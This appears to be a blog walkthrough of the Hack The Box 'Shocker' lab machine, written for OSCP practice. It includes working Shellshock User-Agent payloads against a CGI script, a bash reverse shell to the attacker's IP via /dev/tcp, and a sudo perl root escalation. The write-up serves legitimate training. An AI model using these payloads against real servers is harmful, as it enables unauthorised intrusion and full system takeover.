Hackthebox Shocker Walkthrough (NO Metasploit) OSCP Prep
Box Details
OS: Linux
Exploitable service: Apache via shellshock attack
Difficulty: Easy
Estimated time: 1 hour
1. I first ran an Nmap scan to determine open port and running services.
For full scan: nmap -sC -sV -A 10.10.10.56 (this does default scripts scan, service version and a full scan that include OS discovery and traceroute)
I always enumerate further with an ALL port scan just not to miss any service
nmap -p- 10.10.10.56
though this takes a longer time but it saves you trauma if there are higher ports open.
Results from Nmap scans show that there are only 2 open ports
Port 80 Apache httpd 2.4.18 ((Ubuntu)) webserver and suggest Ubuntu
Port 2222 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
both ports suggest that this box is a linux OS preferably a variant of Ubuntu operating system
Enumeration
My spider sense tells me to start enumerating port 80 first, as i believe SSH service is less exploitable except via bruteforce or username and password enumeration
So i visit the webpage on http://10.10.10.56 and i am presented with an almost creepy looking like page with a bug image and a message “Don’t Bug Me!”
Next i inspect the source code of the web page to view links and get more info about the page. (Ctrl + u will do this)
It just a simple html page. Nothing helpful here to compromise the box.
Next is to perform a Directory bruteforcing to discover hidden web directories and files.
I will be using the tool gobuster for this
you can install via sudo apt-get install gobuster
or you can use other tools such as wfuzz, dirb, and dirbuster for this enumeration.
Run the command: # gobuster dir -u http://10.10.10.56 -w /usr/share/seclists/Discovery/Web-Content/common.txt
seclist wordlist is large wordlist compilation every pentester should have. Its available on github https://github.com/danielmiessler/SecLists and you can also install via apt.
The results from the directory bruteforce shows some interesting directories like /cgi-bin and /server-status. However, this were unaccessible via the web browser.
NOTE: one key lesson from this box is to always perform a second directory enumeration with extensions to look for files like .txt, .sh, .py, .html, .php, and .pl. This is very important.
I didn't perform a file discovery bruteforce with extensions but i did that on the /cgi-bin directory as i had a hunch this was related to shellshock upon seeing the directory.
a script file named user.sh was found in the /cgi-bin directory
access the file downloads the script and accessing it shows that its just an uptime script
Next step would be to check for shellshock vulnerability
This is vulnerability affects systems by giving malicious users the ability to send bash commands to the underlying operating systems its a very dangerous and easily exploitable vulnerability.
Burpsuite will be used to test this vulnerability.
Launch burpsuite, set up burpsuite proxy on your browser and open the script on your browser.
Remember to turn off intercept
now visit your proxy history and send the reqeuest to repeater
read more on testing for shellshock vulnerability https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/
https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
shellshock vulnerability requires you to send malformed http requests containing a header “header: () { :; }; “
i crafted my header using the User-Agent header in a repeater request
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent:() { :;}; echo; /bin/bash -c whoami
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
This was my payload to check for the shellshock vulnerability using bash to run a whoami command.
User-Agent:() { :;}; echo; /bin/bash -c whoami
Bingo! I got a response back with the user details “shelly”
so i decided to test if i could ping my attacking machine as this would give verify the possibility of a bash reverse-shell command working . I also setup a TCPDUMP listner to catch ICMP request coming to my attacking machine
my ping command worked and this was a good thing that guaranteed the success of a bash reverse shell working .
Next i set a netcat listener to catch the reverse shell on my attacking machine on port 443.
nc -lvnp 443 (does the trick)
Then i modify my bash command on burpsuite to send a reverse shell
User-Agent:() { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.17/443 0>&1
This kept waiting, no response was recieved which suggested that the command/process was being executed on the server. So i checked my netcat lisnter i already got a shell as the user shelly.
Privilege Escalation
ran the sudo -l command to see if could run any programs with the root user permissions.
Good news i could run perl as root user without a password as NOPASSWD was set.
https://gtfobins.github.io/gtfobins/perl/#sudo is a great resourse for privilege linux privillege escalation via sudo and suid.
Running
sudo perl -e 'exec "/bin/sh";'
and i got a root shell.
It was as simple as that and straight forward
I tried upgrading the root shell to bash, but all efforts failed as python wasnt installed on the victim.
Thanks for reading.
